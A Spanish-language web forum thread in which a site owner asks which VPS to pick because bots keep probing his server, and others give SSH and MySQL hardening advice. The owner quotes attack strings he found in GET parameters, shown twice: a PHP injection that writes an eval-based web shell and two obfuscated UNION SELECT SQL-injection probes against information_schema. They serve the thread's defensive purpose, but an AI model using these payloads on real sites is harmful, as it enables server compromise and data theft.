jackl007
Eta
Programador
Verificación en dos pasos activada
HolaHola, chicos
Que VPS me recomendan (Latinoamérica), es para un sitio de negocios, así que me gustaría uno que no tenga problemas, y que sus IPS no andan en blacklists, y que no tenga sus IPs recibiendo ataques.
Actualmente contraté un VPS en x10vps, por 35 dólares (1.25 RAM, 50 GB disco, y 1 cpu) + cPanel.
Pues resulta que todo el tiempo recibe ataques de bots, andan escaneando y buscando vulnerabilidades todos los días en el sitio, estoy viendo migrar a otro VPS sin problemas de este tipo.
Diariamente recibo hasta 500 intentos de obtener el login del root por ssh, tengo activado denyhosts para bloquearlos.
Compartan sus experiencias para este tipo de hosting.
Gracias
Hola, chicos
Que VPS me recomendan (Latinoamérica), es para un sitio de negocios, así que me gustaría uno que no tenga problemas, y que sus IPS no andan en blacklists, y que no tenga sus IPs recibiendo ataques.
Actualmente contraté un VPS en x10vps, por 35 dólares (1.25 RAM, 50 GB disco, y 1 cpu) + cPanel.
Pues resulta que todo el tiempo recibe ataques de bots, andan escaneando y buscando vulnerabilidades todos los días en el sitio, estoy viendo migrar a otro VPS sin problemas de este tipo.
Diariamente recibo hasta 500 intentos de obtener el login del root por ssh, tengo activado denyhosts para bloquearlos.
Compartan sus experiencias para este tipo de hosting.
Gracias
Donde sea que compres te pasara lo mismo si no ubicas una persona de confianza que te asegure el servidor.
De igual forma lo que pagas por esos recursos es demasiado comparado a lo que puedes obtener por otros lados.
Ver el archivo adjunto 264894
Y con US$50 de regalo a nuevos clientes https://www.vultr.com/promo/try50/
Empezando por el cPanel... Es algo que puedes solucionar con alternativas 😳
Si gustas escríbeme al privado y te asesoro sin compromiso.
tengo en x10VPS, más de 10 años he usado el servicio prmium de hosting, y pocas veces con el VPS, pero recibe muchos ataques sus VPS.
me interesa CentOS 7 + cPanel, ya que el CentOs 6 va a ser obsoleto este año.
he usado alternativas gratuitas como LXADMIN, pero en este caso, requiero cPanel porque mi cliente lo desea. en sus VPS no se puede agregar la licencia ?
Saludos
Los ataques por SSH no me preocupan mucho, porque 1 intento erroneo al usuario y se bloquea el IP.IMHO intentos de logeo al root x ssh .. acaso aun tenemos el SSH en el port 22
de los interntos fail2ban acotado ayuda bastante .. y usar entrada sin password aun mas .. yo x sanidad mental .. NUNCA port ssh en el 22
y entro solo con llaves y claro un user de emergencias con un nombre marciano con un password de otra galaxia
<php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>
111111111111111111111111111 UNION SELECT (select CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)) FROM information_schema.COLUMNS WHERE `COLUMN_NAME` LIKE char(37,115,111,99,105,97,108,115,101,99,117,114,105,116,121,110,117,109,98,101,114,37) AND ( DATA_TYPE=char(99,104,97,114) OR DATA_TYPE=char(118,97,114,99,104,97,114) OR DATA_TYPE=char(116,101,120,116))),2,3,4,5,6,7
111111111111111111111111111 UNION SELECT (select CONCAT(0x5b6464645d,0x5e,IFNULL(unhex(Hex(cast(TABLE_NAME as char))),0x20),0x5e,0x5e,IFNULL(unhex(Hex(cast(TABLE_SCHEMA as char))),0x20),0x5e,0x5b6464645d) FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE char(37,117,115,101,114,37) limit 0,1),2,3,4,5,6,7
Estas usando algún Framework (laravel, CodeIgniter, etc...) o es simplemente un sitio en wordpress al que están intentando atacarte?Los ataques por SSH no me preocupan mucho, porque 1 intento erroneo al usuario y se bloquea el IP.
lo que me preocupa es que esten buscando vulnerabilidades en mi sitio.
He encontrado que estan ejecutando estas cosas (hasta sql injection) y muchas variantes:
en los GET en las variables ejecutan:
En la variable GET content
<php>file_put_contents('hmseo.php','<?php @eval($_POST[hm]);?>hmseo')</php>
111111111111111111111111111 UNION SELECT (select CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)) FROM information_schema.COLUMNS WHERE `COLUMN_NAME` LIKE char(37,115,111,99,105,97,108,115,101,99,117,114,105,116,121,110,117,109,98,101,114,37) AND ( DATA_TYPE=char(99,104,97,114) OR DATA_TYPE=char(118,97,114,99,104,97,114) OR DATA_TYPE=char(116,101,120,116))),2,3,4,5,6,7
111111111111111111111111111 UNION SELECT (select CONCAT(0x5b6464645d,0x5e,IFNULL(unhex(Hex(cast(TABLE_NAME as char))),0x20),0x5e,0x5e,IFNULL(unhex(Hex(cast(TABLE_SCHEMA as char))),0x20),0x5e,0x5b6464645d) FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE char(37,117,115,101,114,37) limit 0,1),2,3,4,5,6,7
Hola, no es csm propio, y ando parchando también huecos de seguridad, no han considerado muchas cosas para darle un mínimo de seguridad.Estas usando algún Framework (laravel, CodeIgniter, etc...) o es simplemente un sitio en wordpress al que están intentando atacarte?
Estan intentando atacar la tabla maestra de MySQL information_schema, la unica forma que logren llegar a esa tabla es:
Si esto es asi, proceda a cambiar la clave de root de MySQL o en su defecto degrade los privilegios del usuario solo a la BD del CMS.
- Estes usando en su CMS el usuario root de MySQL
- El Usuario de la BD de su CMS tenga GRANT PRIVILEGE sobre todas las BD
Ahora bien revise que su CMS cuente con todas las mejores practicas de seguridad en el desarrollo, y nunca esta de mas usar WAF para proteger las aplicaciones (ModSecurity)
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?
Utilizamos cookies y tecnologías similares para los siguientes fines:
¿Aceptas las cookies y estas tecnologías?